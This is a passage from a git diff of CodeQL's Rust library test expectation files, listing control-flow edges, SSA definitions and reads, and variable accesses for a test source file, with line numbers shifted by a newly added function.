arrays | variables.rs:510:5:510:26 | let ... = ... | | +| variables.rs:509:1:516:1 | exit fn arrays (normal) | variables.rs:509:1:516:1 | exit fn arrays | | +| variables.rs:509:13:516:1 | { ... } | variables.rs:509:1:516:1 | exit fn arrays (normal) | | +| variables.rs:510:5:510:26 | let ... = ... | variables.rs:510:18:510:18 | 1 | | +| variables.rs:510:9:510:13 | a | variables.rs:511:5:511:20 | ExprStmt | match | +| variables.rs:510:17:510:25 | [...] | variables.rs:510:9:510:13 | a | | +| variables.rs:510:18:510:18 | 1 | variables.rs:510:21:510:21 | 2 | | +| variables.rs:510:21:510:21 | 2 | variables.rs:510:24:510:24 | 3 | | +| variables.rs:510:24:510:24 | 3 | variables.rs:510:17:510:25 | [...] | | +| variables.rs:511:5:511:13 | print_i64 | variables.rs:511:15:511:15 | a | | +| variables.rs:511:5:511:19 | print_i64(...) | variables.rs:512:5:512:13 | ExprStmt | | +| variables.rs:511:5:511:20 | ExprStmt | variables.rs:511:5:511:13 | print_i64 | | +| variables.rs:511:15:511:15 | a | variables.rs:511:17:511:17 | 0 | | +| variables.rs:511:15:511:18 | a[0] | variables.rs:511:5:511:19 | print_i64(...) | | +| variables.rs:511:17:511:17 | 0 | variables.rs:511:15:511:18 | a[0] | | +| variables.rs:512:5:512:5 | a | variables.rs:512:7:512:7 | 1 | | +| variables.rs:512:5:512:8 | a[1] | variables.rs:512:12:512:12 | 5 | | +| variables.rs:512:5:512:12 | ... = ... | variables.rs:513:5:513:20 | ExprStmt | | +| variables.rs:512:5:512:13 | ExprStmt | variables.rs:512:5:512:5 | a | | +| variables.rs:512:7:512:7 | 1 | variables.rs:512:5:512:8 | a[1] | | +| variables.rs:512:12:512:12 | 5 | variables.rs:512:5:512:12 | ... = ... | | +| variables.rs:513:5:513:13 | print_i64 | variables.rs:513:15:513:15 | a | | +| variables.rs:513:5:513:19 | print_i64(...) | variables.rs:514:5:514:18 | ExprStmt | | +| variables.rs:513:5:513:20 | ExprStmt | variables.rs:513:5:513:13 | print_i64 | | +| variables.rs:513:15:513:15 | a | variables.rs:513:17:513:17 | 1 | | +| variables.rs:513:15:513:18 | a[1] | variables.rs:513:5:513:19 | print_i64(...) | | +| variables.rs:513:17:513:17 | 1 | variables.rs:513:15:513:18 | a[1] | | +| variables.rs:514:5:514:5 | a | variables.rs:514:10:514:10 | 4 | | +| variables.rs:514:5:514:17 | ... = ... | variables.rs:515:5:515:20 | ExprStmt | | +| variables.rs:514:5:514:18 | ExprStmt | variables.rs:514:5:514:5 | a | | +| variables.rs:514:9:514:17 | [...] | variables.rs:514:5:514:17 | ... = ... | | +| variables.rs:514:10:514:10 | 4 | variables.rs:514:13:514:13 | 5 | | +| variables.rs:514:13:514:13 | 5 | variables.rs:514:16:514:16 | 6 | | +| variables.rs:514:16:514:16 | 6 | variables.rs:514:9:514:17 | [...] | | +| variables.rs:515:5:515:13 | print_i64 | variables.rs:515:15:515:15 | a | | +| variables.rs:515:5:515:19 | print_i64(...) | variables.rs:509:13:516:1 | { ... } | | +| variables.rs:515:5:515:20 | ExprStmt | variables.rs:515:5:515:13 | print_i64 | | +| variables.rs:515:15:515:15 | a | variables.rs:515:17:515:17 | 2 | | +| variables.rs:515:15:515:18 | a[2] | variables.rs:515:5:515:19 | print_i64(...) | | +| variables.rs:515:17:515:17 | 2 | variables.rs:515:15:515:18 | a[2] | | +| variables.rs:518:1:525:1 | enter fn ref_arg | variables.rs:519:5:519:15 | let ... = 16 | | +| variables.rs:518:1:525:1 | exit fn ref_arg (normal) | variables.rs:518:1:525:1 | exit fn ref_arg | | +| variables.rs:518:14:525:1 | { ... } | variables.rs:518:1:525:1 | exit fn ref_arg (normal) | | +| variables.rs:519:5:519:15 | let ... = 16 | variables.rs:519:13:519:14 | 16 | | +| variables.rs:519:9:519:9 | x | variables.rs:520:5:520:22 | ExprStmt | match | +| variables.rs:519:13:519:14 | 16 | variables.rs:519:9:519:9 | x | | +| variables.rs:520:5:520:17 | print_i64_ref | variables.rs:520:20:520:20 | x | | +| variables.rs:520:5:520:21 | print_i64_ref(...) | variables.rs:521:5:521:17 | ExprStmt | | +| variables.rs:520:5:520:22 | ExprStmt | variables.rs:520:5:520:17 | print_i64_ref | | +| variables.rs:520:19:520:20 | &x | variables.rs:520:5:520:21 | print_i64_ref(...) | | +| variables.rs:520:20:520:20 | x | variables.rs:520:19:520:20 | &x | | +| variables.rs:521:5:521:13 | print_i64 | variables.rs:521:15:521:15 | x | | +| variables.rs:521:5:521:16 | print_i64(...) | variables.rs:523:5:523:15 | let ... = 17 | | +| variables.rs:521:5:521:17 | ExprStmt | variables.rs:521:5:521:13 | print_i64 | | +| variables.rs:521:15:521:15 | x | variables.rs:521:5:521:16 | print_i64(...) | | +| variables.rs:523:5:523:15 | let ... = 17 | variables.rs:523:13:523:14 | 17 | | +| variables.rs:523:9:523:9 | z | variables.rs:524:5:524:22 | ExprStmt | match | +| variables.rs:523:13:523:14 | 17 | variables.rs:523:9:523:9 | z | | +| variables.rs:524:5:524:17 | print_i64_ref | variables.rs:524:20:524:20 | z | | +| variables.rs:524:5:524:21 | print_i64_ref(...) | variables.rs:518:14:525:1 | { ... } | | +| variables.rs:524:5:524:22 | ExprStmt | variables.rs:524:5:524:17 | print_i64_ref | | +| variables.rs:524:19:524:20 | &z | variables.rs:524:5:524:21 | print_i64_ref(...) | | +| variables.rs:524:20:524:20 | z | variables.rs:524:19:524:20 | &z | | +| variables.rs:532:3:534:3 | enter fn bar | variables.rs:532:15:532:18 | self | | +| variables.rs:532:3:534:3 | exit fn bar (normal) | variables.rs:532:3:534:3 | exit fn bar | | +| variables.rs:532:10:532:18 | SelfParam | variables.rs:533:5:533:32 | ExprStmt | | +| variables.rs:532:15:532:18 | self | variables.rs:532:10:532:18 | SelfParam | | +| variables.rs:532:21:534:3 | { ... } | variables.rs:532:3:534:3 | exit fn bar (normal) | | +| variables.rs:533:5:533:9 | * ... | variables.rs:533:29:533:29 | 3 | | +| variables.rs:533:5:533:31 | ... = ... | variables.rs:532:21:534:3 | { ... } | | +| variables.rs:533:5:533:32 | ExprStmt | variables.rs:533:6:533:9 | self | | +| variables.rs:533:6:533:9 | self | variables.rs:533:5:533:9 | * ... | | +| variables.rs:533:13:533:31 | MyStruct {...} | variables.rs:533:5:533:31 | ... = ... | | +| variables.rs:533:29:533:29 | 3 | variables.rs:533:13:533:31 | MyStruct {...} | | +| variables.rs:537:1:542:1 | enter fn ref_methodcall_receiver | variables.rs:538:3:538:34 | let ... = ... | | +| variables.rs:537:1:542:1 | exit fn ref_methodcall_receiver (normal) | variables.rs:537:1:542:1 | exit fn ref_methodcall_receiver | | +| variables.rs:537:30:542:1 | { ... } | variables.rs:537:1:542:1 | exit fn ref_methodcall_receiver (normal) | | +| variables.rs:538:3:538:34 | let ... = ... | variables.rs:538:31:538:31 | 1 | | +| variables.rs:538:7:538:11 | a | variables.rs:539:3:539:10 | ExprStmt | match | +| variables.rs:538:15:538:33 | MyStruct {...} | variables.rs:538:7:538:11 | a | | +| variables.rs:538:31:538:31 | 1 | variables.rs:538:15:538:33 | MyStruct {...} | | +| variables.rs:539:3:539:3 | a | variables.rs:539:3:539:9 | a.bar(...) | | +| variables.rs:539:3:539:9 | a.bar(...) | variables.rs:541:3:541:19 | ExprStmt | | +| variables.rs:539:3:539:10 | ExprStmt | variables.rs:539:3:539:3 | a | | +| variables.rs:541:3:541:11 | print_i64 | variables.rs:541:13:541:13 | a | | +| variables.rs:541:3:541:18 | print_i64(...) | variables.rs:537:30:542:1 | { ... } | | +| variables.rs:541:3:541:19 | ExprStmt | variables.rs:541:3:541:11 | print_i64 | | +| variables.rs:541:13:541:13 | a | variables.rs:541:13:541:17 | a.val | | +| variables.rs:541:13:541:17 | a.val | variables.rs:541:3:541:18 | print_i64(...) | | +| variables.rs:544:1:578:1 | enter fn main | variables.rs:545:5:545:25 | ExprStmt | | +| variables.rs:544:1:578:1 | exit fn main (normal) | variables.rs:544:1:578:1 | exit fn main | | +| variables.rs:544:11:578:1 | { ... } | variables.rs:544:1:578:1 | exit fn main (normal) | | +| variables.rs:545:5:545:22 | immutable_variable | variables.rs:545:5:545:24 | immutable_variable(...) | | +| variables.rs:545:5:545:24 | immutable_variable(...) | variables.rs:546:5:546:23 | ExprStmt | | +| variables.rs:545:5:545:25 | ExprStmt | variables.rs:545:5:545:22 | immutable_variable | | +| variables.rs:546:5:546:20 | mutable_variable | variables.rs:546:5:546:22 | mutable_variable(...) | | +| variables.rs:546:5:546:22 | mutable_variable(...) | variables.rs:547:5:547:40 | ExprStmt | | +| variables.rs:546:5:546:23 | ExprStmt | variables.rs:546:5:546:20 | mutable_variable | | +| variables.rs:547:5:547:37 | mutable_variable_immutable_borrow | variables.rs:547:5:547:39 | mutable_variable_immutable_borrow(...) | | +| variables.rs:547:5:547:39 | mutable_variable_immutable_borrow(...) | variables.rs:548:5:548:23 | ExprStmt | | +| variables.rs:547:5:547:40 | ExprStmt | variables.rs:547:5:547:37 | mutable_variable_immutable_borrow | | +| variables.rs:548:5:548:20 | variable_shadow1 | variables.rs:548:5:548:22 | variable_shadow1(...) | | +| variables.rs:548:5:548:22 | variable_shadow1(...) | variables.rs:549:5:549:23 | ExprStmt | | +| variables.rs:548:5:548:23 | ExprStmt | variables.rs:548:5:548:20 | variable_shadow1 | | +| variables.rs:549:5:549:20 | variable_shadow2 | variables.rs:549:5:549:22 | variable_shadow2(...) | | +| variables.rs:549:5:549:22 | variable_shadow2(...) | variables.rs:550:5:550:19 | ExprStmt | | +| variables.rs:549:5:549:23 | ExprStmt | variables.rs:549:5:549:20 | variable_shadow2 | | +| variables.rs:550:5:550:16 | let_pattern1 | variables.rs:550:5:550:18 | let_pattern1(...) | | +| variables.rs:550:5:550:18 | let_pattern1(...) | variables.rs:551:5:551:19 | ExprStmt | | +| variables.rs:550:5:550:19 | ExprStmt | variables.rs:550:5:550:16 | let_pattern1 | | +| variables.rs:551:5:551:16 | let_pattern2 | variables.rs:551:5:551:18 | let_pattern2(...) | | +| variables.rs:551:5:551:18 | let_pattern2(...) | variables.rs:552:5:552:19 | ExprStmt | | +| variables.rs:551:5:551:19 | ExprStmt | variables.rs:551:5:551:16 | let_pattern2 | | +| variables.rs:552:5:552:16 | let_pattern3 | variables.rs:552:5:552:18 | let_pattern3(...) | | +| variables.rs:552:5:552:18 | let_pattern3(...) | variables.rs:553:5:553:19 | ExprStmt | | +| variables.rs:552:5:552:19 | ExprStmt | variables.rs:552:5:552:16 | let_pattern3 | | +| variables.rs:553:5:553:16 | let_pattern4 | variables.rs:553:5:553:18 | let_pattern4(...) | | +| variables.rs:553:5:553:18 | let_pattern4(...) | variables.rs:554:5:554:21 | ExprStmt | | +| variables.rs:553:5:553:19 | ExprStmt | variables.rs:553:5:553:16 | let_pattern4 | | +| variables.rs:554:5:554:18 | match_pattern1 | variables.rs:554:5:554:20 | match_pattern1(...) | | +| variables.rs:554:5:554:20 | match_pattern1(...) | variables.rs:555:5:555:21 | ExprStmt | | +| variables.rs:554:5:554:21 | ExprStmt | variables.rs:554:5:554:18 | match_pattern1 | | +| variables.rs:555:5:555:18 | match_pattern2 | variables.rs:555:5:555:20 | match_pattern2(...) | | +| variables.rs:555:5:555:20 | match_pattern2(...) | variables.rs:556:5:556:21 | ExprStmt | | +| variables.rs:555:5:555:21 | ExprStmt | variables.rs:555:5:555:18 | match_pattern2 | | +| variables.rs:556:5:556:18 | match_pattern3 | variables.rs:556:5:556:20 | match_pattern3(...) | | +| variables.rs:556:5:556:20 | match_pattern3(...) | variables.rs:557:5:557:21 | ExprStmt | | +| variables.rs:556:5:556:21 | ExprStmt | variables.rs:556:5:556:18 | match_pattern3 | | +| variables.rs:557:5:557:18 | match_pattern4 | variables.rs:557:5:557:20 | match_pattern4(...) | | +| variables.rs:557:5:557:20 | match_pattern4(...) | variables.rs:558:5:558:21 | ExprStmt | | +| variables.rs:557:5:557:21 | ExprStmt | variables.rs:557:5:557:18 | match_pattern4 | | +| variables.rs:558:5:558:18 | match_pattern5 | variables.rs:558:5:558:20 | match_pattern5(...) | | +| variables.rs:558:5:558:20 | match_pattern5(...) | variables.rs:559:5:559:21 | ExprStmt | | +| variables.rs:558:5:558:21 | ExprStmt | variables.rs:558:5:558:18 | match_pattern5 | | +| variables.rs:559:5:559:18 | match_pattern6 | variables.rs:559:5:559:20 | match_pattern6(...) | | +| variables.rs:559:5:559:20 | match_pattern6(...) | variables.rs:560:5:560:21 | ExprStmt | | +| variables.rs:559:5:559:21 | ExprStmt | variables.rs:559:5:559:18 | match_pattern6 | | +| variables.rs:560:5:560:18 | match_pattern7 | variables.rs:560:5:560:20 | match_pattern7(...) | | +| variables.rs:560:5:560:20 | match_pattern7(...) | variables.rs:561:5:561:21 | ExprStmt | | +| variables.rs:560:5:560:21 | ExprStmt | variables.rs:560:5:560:18 | match_pattern7 | | +| variables.rs:561:5:561:18 | match_pattern8 | variables.rs:561:5:561:20 | match_pattern8(...) | | +| variables.rs:561:5:561:20 | match_pattern8(...) | variables.rs:562:5:562:21 | ExprStmt | | +| variables.rs:561:5:561:21 | ExprStmt | variables.rs:561:5:561:18 | match_pattern8 | | +| variables.rs:562:5:562:18 | match_pattern9 | variables.rs:562:5:562:20 | match_pattern9(...) | | +| variables.rs:562:5:562:20 | match_pattern9(...) | variables.rs:563:5:563:36 | ExprStmt | | +| variables.rs:562:5:562:21 | ExprStmt | variables.rs:562:5:562:18 | match_pattern9 | | +| variables.rs:563:5:563:18 | param_pattern1 | variables.rs:563:20:563:22 | "a" | | +| variables.rs:563:5:563:35 | param_pattern1(...) | variables.rs:564:5:564:37 | ExprStmt | | +| variables.rs:563:5:563:36 | ExprStmt | variables.rs:563:5:563:18 | param_pattern1 | | +| variables.rs:563:20:563:22 | "a" | variables.rs:563:26:563:28 | "b" | | +| variables.rs:563:25:563:34 | TupleExpr | variables.rs:563:5:563:35 | param_pattern1(...) | | +| variables.rs:563:26:563:28 | "b" | variables.rs:563:31:563:33 | "c" | | +| variables.rs:563:31:563:33 | "c" | variables.rs:563:25:563:34 | TupleExpr | | +| variables.rs:564:5:564:18 | param_pattern2 | variables.rs:564:20:564:31 | ...::Left | | +| variables.rs:564:5:564:36 | param_pattern2(...) | variables.rs:565:5:565:26 | ExprStmt | | +| variables.rs:564:5:564:37 | ExprStmt | variables.rs:564:5:564:18 | param_pattern2 | | +| variables.rs:564:20:564:31 | ...::Left | variables.rs:564:33:564:34 | 45 | | +| variables.rs:564:20:564:35 | ...::Left(...) | variables.rs:564:5:564:36 | param_pattern2(...) | | +| variables.rs:564:33:564:34 | 45 | variables.rs:564:20:564:35 | ...::Left(...) | | +| variables.rs:565:5:565:23 | destruct_assignment | variables.rs:565:5:565:25 | destruct_assignment(...) | | +| variables.rs:565:5:565:25 | destruct_assignment(...) | variables.rs:566:5:566:23 | ExprStmt | | +| variables.rs:565:5:565:26 | ExprStmt | variables.rs:565:5:565:23 | destruct_assignment | | +| variables.rs:566:5:566:20 | closure_variable | variables.rs:566:5:566:22 | closure_variable(...) | | +| variables.rs:566:5:566:22 | closure_variable(...) | variables.rs:567:5:567:19 | ExprStmt | | +| variables.rs:566:5:566:23 | ExprStmt | variables.rs:566:5:566:20 | closure_variable | | +| variables.rs:567:5:567:16 | for_variable | variables.rs:567:5:567:18 | for_variable(...) | | +| variables.rs:567:5:567:18 | for_variable(...) | variables.rs:568:5:568:17 | ExprStmt | | +| variables.rs:567:5:567:19 | ExprStmt | variables.rs:567:5:567:16 | for_variable | | +| variables.rs:568:5:568:14 | add_assign | variables.rs:568:5:568:16 | add_assign(...) | | +| variables.rs:568:5:568:16 | add_assign(...) | variables.rs:569:5:569:13 | ExprStmt | | +| variables.rs:568:5:568:17 | ExprStmt | variables.rs:568:5:568:14 | add_assign | | +| variables.rs:569:5:569:10 | mutate | variables.rs:569:5:569:12 | mutate(...) | | +| variables.rs:569:5:569:12 | mutate(...) | variables.rs:570:5:570:17 | ExprStmt | | +| variables.rs:569:5:569:13 | ExprStmt | variables.rs:569:5:569:10 | mutate | | +| variables.rs:570:5:570:14 | mutate_arg | variables.rs:570:5:570:16 | mutate_arg(...) | | +| variables.rs:570:5:570:16 | mutate_arg(...) | variables.rs:571:5:571:12 | ExprStmt | | +| variables.rs:570:5:570:17 | ExprStmt | variables.rs:570:5:570:14 | mutate_arg | | +| variables.rs:571:5:571:9 | alias | variables.rs:571:5:571:11 | alias(...) | | +| variables.rs:571:5:571:11 | alias(...) | variables.rs:572:5:572:18 | ExprStmt | | +| variables.rs:571:5:571:12 | ExprStmt | variables.rs:571:5:571:9 | alias | | +| variables.rs:572:5:572:15 | capture_mut | variables.rs:572:5:572:17 | capture_mut(...) | | +| variables.rs:572:5:572:17 | capture_mut(...) | variables.rs:573:5:573:20 | ExprStmt | | +| variables.rs:572:5:572:18 | ExprStmt | variables.rs:572:5:572:15 | capture_mut | | +| variables.rs:573:5:573:17 | capture_immut | variables.rs:573:5:573:19 | capture_immut(...) | | +| variables.rs:573:5:573:19 | capture_immut(...) | variables.rs:574:5:574:26 | ExprStmt | | +| variables.rs:573:5:573:20 | ExprStmt | variables.rs:573:5:573:17 | capture_immut | | +| variables.rs:574:5:574:23 | async_block_capture | variables.rs:574:5:574:25 | async_block_capture(...) | | +| variables.rs:574:5:574:25 | async_block_capture(...) | variables.rs:575:5:575:14 | ExprStmt | | +| variables.rs:574:5:574:26 | ExprStmt | variables.rs:574:5:574:23 | async_block_capture | | +| variables.rs:575:5:575:11 | structs | variables.rs:575:5:575:13 | structs(...) | | +| variables.rs:575:5:575:13 | structs(...) | variables.rs:576:5:576:14 | ExprStmt | | +| variables.rs:575:5:575:14 | ExprStmt | variables.rs:575:5:575:11 | structs | | +| variables.rs:576:5:576:11 | ref_arg | variables.rs:576:5:576:13 | ref_arg(...) | | +| variables.rs:576:5:576:13 | ref_arg(...) | variables.rs:577:5:577:30 | ExprStmt | | +| variables.rs:576:5:576:14 | ExprStmt | variables.rs:576:5:576:11 | ref_arg | | +| variables.rs:577:5:577:27 | ref_methodcall_receiver | variables.rs:577:5:577:29 | ref_methodcall_receiver(...) | | +| variables.rs:577:5:577:29 | ref_methodcall_receiver(...) | variables.rs:544:11:578:1 | { ... } | | +| variables.rs:577:5:577:30 | ExprStmt | variables.rs:577:5:577:27 | ref_methodcall_receiver | | breakTarget continueTarget diff --git a/rust/ql/test/library-tests/variables/Ssa.expected b/rust/ql/test/library-tests/variables/Ssa.expected index 18fc0cffc35..714c5e34a4e 100644 --- a/rust/ql/test/library-tests/variables/Ssa.expected +++ b/rust/ql/test/library-tests/variables/Ssa.expected @@ -5,8 +5,8 @@ nonSsaVariable | variables.rs:379:13:379:13 | z | | variables.rs:392:13:392:13 | x | | variables.rs:426:13:426:13 | z | -| variables.rs:492:13:492:13 | a | -| variables.rs:529:11:529:11 | a | +| variables.rs:501:13:501:13 | a | +| variables.rs:538:11:538:11 | a | definition | variables.rs:3:14:3:14 | s | variables.rs:3:14:3:14 | s | | variables.rs:7:14:7:14 | i | variables.rs:7:14:7:14 | i | @@ -136,11 +136,13 @@ definition | variables.rs:462:9:462:9 | x | variables.rs:462:9:462:9 | x | | variables.rs:482:15:482:23 | SelfParam | variables.rs:482:20:482:23 | self | | variables.rs:486:11:486:14 | SelfParam | variables.rs:486:11:486:14 | self | -| variables.rs:501:9:501:13 | a | variables.rs:501:13:501:13 | a | -| variables.rs:505:5:505:5 | a | variables.rs:501:13:501:13 | a | -| variables.rs:510:9:510:9 | x | variables.rs:510:9:510:9 | x | -| variables.rs:514:9:514:9 | z | variables.rs:514:9:514:9 | z | -| variables.rs:523:10:523:18 | SelfParam | variables.rs:523:15:523:18 | self | +| variables.rs:491:13:491:17 | f | variables.rs:491:17:491:17 | f | +| variables.rs:491:22:491:22 | n | variables.rs:491:22:491:22 | n | +| variables.rs:510:9:510:13 | a | variables.rs:510:13:510:13 | a | +| variables.rs:514:5:514:5 | a | variables.rs:510:13:510:13 | a | +| variables.rs:519:9:519:9 | x | variables.rs:519:9:519:9 | x | +| variables.rs:523:9:523:9 | z | variables.rs:523:9:523:9 | z | +| variables.rs:532:10:532:18 | SelfParam | variables.rs:532:15:532:18 | self | read | variables.rs:3:14:3:14 | s | variables.rs:3:14:3:14 | s | variables.rs:4:20:4:20 | s | | variables.rs:7:14:7:14 | i | variables.rs:7:14:7:14 | i | variables.rs:8:20:8:20 | i | @@ -264,12 +266,15 @@ read | variables.rs:462:9:462:9 | x | variables.rs:462:9:462:9 | x | variables.rs:472:19:472:19 | x | | variables.rs:482:15:482:23 | SelfParam | variables.rs:482:20:482:23 | self | variables.rs:483:16:483:19 | self | | variables.rs:486:11:486:14 | SelfParam | variables.rs:486:11:486:14 | self | variables.rs:487:9:487:12 | self | -| variables.rs:501:9:501:13 | a | variables.rs:501:13:501:13 | a | variables.rs:502:15:502:15 | a | -| variables.rs:501:9:501:13 | a | variables.rs:501:13:501:13 | a | variables.rs:503:5:503:5 | a | -| variables.rs:501:9:501:13 | a | variables.rs:501:13:501:13 | a | variables.rs:504:15:504:15 | a | -| variables.rs:505:5:505:5 | a | variables.rs:501:13:501:13 | a | variables.rs:506:15:506:15 | a | -| variables.rs:510:9:510:9 | x | variables.rs:510:9:510:9 | x | variables.rs:512:15:512:15 | x | -| variables.rs:523:10:523:18 | SelfParam | variables.rs:523:15:523:18 | self | variables.rs:524:6:524:9 | self | +| variables.rs:491:13:491:17 | f | variables.rs:491:17:491:17 | f | variables.rs:495:9:495:9 | f | +| variables.rs:491:13:491:17 | f | variables.rs:491:17:491:17 | f | variables.rs:496:9:496:9 | f | +| variables.rs:491:22:491:22 | n | variables.rs:491:22:491:22 | n | variables.rs:493:25:493:25 | n | +| variables.rs:510:9:510:13 | a | variables.rs:510:13:510:13 | a | variables.rs:511:15:511:15 | a | +| variables.rs:510:9:510:13 | a | variables.rs:510:13:510:13 | a | variables.rs:512:5:512:5 | a | +| variables.rs:510:9:510:13 | a | variables.rs:510:13:510:13 | a | variables.rs:513:15:513:15 | a | +| variables.rs:514:5:514:5 | a | variables.rs:510:13:510:13 | a | variables.rs:515:15:515:15 | a | +| variables.rs:519:9:519:9 | x | variables.rs:519:9:519:9 | x | variables.rs:521:15:521:15 | x | +| variables.rs:532:10:532:18 | SelfParam | variables.rs:532:15:532:18 | self | variables.rs:533:6:533:9 | self | firstRead | variables.rs:3:14:3:14 | s | variables.rs:3:14:3:14 | s | variables.rs:4:20:4:20 | s | | variables.rs:7:14:7:14 | i | variables.rs:7:14:7:14 | i | variables.rs:8:20:8:20 | i | @@ -370,10 +375,12 @@ firstRead | variables.rs:462:9:462:9 | x | variables.rs:462:9:462:9 | x | variables.rs:466:19:466:19 | x | | variables.rs:482:15:482:23 | SelfParam | variables.rs:482:20:482:23 | self | variables.rs:483:16:483:19 | self | | variables.rs:486:11:486:14 | SelfParam | variables.rs:486:11:486:14 | self | variables.rs:487:9:487:12 | self | -| variables.rs:501:9:501:13 | a | variables.rs:501:13:501:13 | a | variables.rs:502:15:502:15 | a | -| variables.rs:505:5:505:5 | a | variables.rs:501:13:501:13 | a | variables.rs:506:15:506:15 | a | -| variables.rs:510:9:510:9 | x | variables.rs:510:9:510:9 | x | variables.rs:512:15:512:15 | x | -| variables.rs:523:10:523:18 | SelfParam | variables.rs:523:15:523:18 | self | variables.rs:524:6:524:9 | self | +| variables.rs:491:13:491:17 | f | variables.rs:491:17:491:17 | f | variables.rs:495:9:495:9 | f | +| variables.rs:491:22:491:22 | n | variables.rs:491:22:491:22 | n | variables.rs:493:25:493:25 | n | +| variables.rs:510:9:510:13 | a | variables.rs:510:13:510:13 | a | variables.rs:511:15:511:15 | a | +| variables.rs:514:5:514:5 | a | variables.rs:510:13:510:13 | a | variables.rs:515:15:515:15 | a | +| variables.rs:519:9:519:9 | x | variables.rs:519:9:519:9 | x | variables.rs:521:15:521:15 | x | +| variables.rs:532:10:532:18 | SelfParam | variables.rs:532:15:532:18 | self | variables.rs:533:6:533:9 | self | lastRead | variables.rs:3:14:3:14 | s | variables.rs:3:14:3:14 | s | variables.rs:4:20:4:20 | s | | variables.rs:7:14:7:14 | i | variables.rs:7:14:7:14 | i | variables.rs:8:20:8:20 | i | @@ -475,10 +482,12 @@ lastRead | variables.rs:462:9:462:9 | x | variables.rs:462:9:462:9 | x | variables.rs:472:19:472:19 | x | | variables.rs:482:15:482:23 | SelfParam | variables.rs:482:20:482:23 | self | variables.rs:483:16:483:19 | self | | variables.rs:486:11:486:14 | SelfParam | variables.rs:486:11:486:14 | self | variables.rs:487:9:487:12 | self | -| variables.rs:501:9:501:13 | a | variables.rs:501:13:501:13 | a | variables.rs:504:15:504:15 | a | -| variables.rs:505:5:505:5 | a | variables.rs:501:13:501:13 | a | variables.rs:506:15:506:15 | a | -| variables.rs:510:9:510:9 | x | variables.rs:510:9:510:9 | x | variables.rs:512:15:512:15 | x | -| variables.rs:523:10:523:18 | SelfParam | variables.rs:523:15:523:18 | self | variables.rs:524:6:524:9 | self | +| variables.rs:491:13:491:17 | f | variables.rs:491:17:491:17 | f | variables.rs:496:9:496:9 | f | +| variables.rs:491:22:491:22 | n | variables.rs:491:22:491:22 | n | variables.rs:493:25:493:25 | n | +| variables.rs:510:9:510:13 | a | variables.rs:510:13:510:13 | a | variables.rs:513:15:513:15 | a | +| variables.rs:514:5:514:5 | a | variables.rs:510:13:510:13 | a | variables.rs:515:15:515:15 | a | +| variables.rs:519:9:519:9 | x | variables.rs:519:9:519:9 | x | variables.rs:521:15:521:15 | x | +| variables.rs:532:10:532:18 | SelfParam | variables.rs:532:15:532:18 | self | variables.rs:533:6:533:9 | self | adjacentReads | variables.rs:35:9:35:10 | x3 | variables.rs:35:9:35:10 | x3 | variables.rs:36:15:36:16 | x3 | variables.rs:38:9:38:10 | x3 | | variables.rs:43:9:43:10 | x4 | variables.rs:43:9:43:10 | x4 | variables.rs:44:15:44:16 | x4 | variables.rs:49:15:49:16 | x4 | @@ -506,8 +515,9 @@ adjacentReads | variables.rs:462:9:462:9 | x | variables.rs:462:9:462:9 | x | variables.rs:464:19:464:19 | x | variables.rs:472:19:472:19 | x | | variables.rs:462:9:462:9 | x | variables.rs:462:9:462:9 | x | variables.rs:466:19:466:19 | x | variables.rs:470:19:470:19 | x | | variables.rs:462:9:462:9 | x | variables.rs:462:9:462:9 | x | variables.rs:466:19:466:19 | x | variables.rs:472:19:472:19 | x | -| variables.rs:501:9:501:13 | a | variables.rs:501:13:501:13 | a | variables.rs:502:15:502:15 | a | variables.rs:503:5:503:5 | a | -| variables.rs:501:9:501:13 | a | variables.rs:501:13:501:13 | a | variables.rs:503:5:503:5 | a | variables.rs:504:15:504:15 | a | +| variables.rs:491:13:491:17 | f | variables.rs:491:17:491:17 | f | variables.rs:495:9:495:9 | f | variables.rs:496:9:496:9 | f | +| variables.rs:510:9:510:13 | a | variables.rs:510:13:510:13 | a | variables.rs:511:15:511:15 | a | variables.rs:512:5:512:5 | a | +| variables.rs:510:9:510:13 | a | variables.rs:510:13:510:13 | a | variables.rs:512:5:512:5 | a | variables.rs:513:15:513:15 | a | phi | variables.rs:191:9:191:44 | [match(true)] phi | variables.rs:191:9:191:44 | a3 | variables.rs:191:22:191:23 | a3 | | variables.rs:191:9:191:44 | [match(true)] phi | variables.rs:191:9:191:44 | a3 | variables.rs:191:42:191:43 | a3 | @@ -583,4 +593,4 @@ assigns | variables.rs:438:9:438:9 | i | variables.rs:438:13:438:13 | 1 | | variables.rs:450:9:450:9 | x | variables.rs:450:13:450:13 | 2 | | variables.rs:454:9:454:9 | x | variables.rs:454:13:454:13 | 3 | -| variables.rs:505:5:505:5 | a | variables.rs:505:9:505:17 | [...] | +| variables.rs:514:5:514:5 | a | variables.rs:514:9:514:17 | [...] | diff --git a/rust/ql/test/library-tests/variables/variables.expected b/rust/ql/test/library-tests/variables/variables.expected index 0ccdbfb55be..63abece5a72 100644 --- a/rust/ql/test/library-tests/variables/variables.expected +++ b/rust/ql/test/library-tests/variables/variables.expected @@ -1,4 +1,8 @@ testFailures +| variables.rs:493:13:493:16 | self | Unexpected result: read_access=self | +| variables.rs:493:25:493:25 | n | Unexpected result: read_access=n | +| variables.rs:495:9:495:9 | f | Unexpected result: read_access=f | +| variables.rs:496:9:496:9 | f | Unexpected result: read_access=f | variable | variables.rs:3:14:3:14 | s | | variables.rs:7:14:7:14 | i | @@ -96,12 +100,15 @@ variable | variables.rs:462:9:462:9 | x | | variables.rs:482:20:482:23 | self | | variables.rs:486:11:486:14 | self | -| variables.rs:492:13:492:13 | a | +| variables.rs:490:23:490:26 | self | +| variables.rs:491:17:491:17 | f | +| variables.rs:491:22:491:22 | n | | variables.rs:501:13:501:13 | a | -| variables.rs:510:9:510:9 | x | -| variables.rs:514:9:514:9 | z | -| variables.rs:523:15:523:18 | self | -| variables.rs:529:11:529:11 | a | +| variables.rs:510:13:510:13 | a | +| variables.rs:519:9:519:9 | x | +| variables.rs:523:9:523:9 | z | +| variables.rs:532:15:532:18 | self | +| variables.rs:538:11:538:11 | a | variableAccess | variables.rs:4:20:4:20 | s | variables.rs:3:14:3:14 | s | | variables.rs:8:20:8:20 | i | variables.rs:7:14:7:14 | i | @@ -251,22 +258,26 @@ variableAccess | variables.rs:472:19:472:19 | x | variables.rs:462:9:462:9 | x | | variables.rs:483:16:483:19 | self | variables.rs:482:20:482:23 | self | | variables.rs:487:9:487:12 | self | variables.rs:486:11:486:14 | self | -| variables.rs:493:15:493:15 | a | variables.rs:492:13:492:13 | a | -| variables.rs:494:5:494:5 | a | variables.rs:492:13:492:13 | a | -| variables.rs:495:15:495:15 | a | variables.rs:492:13:492:13 | a | -| 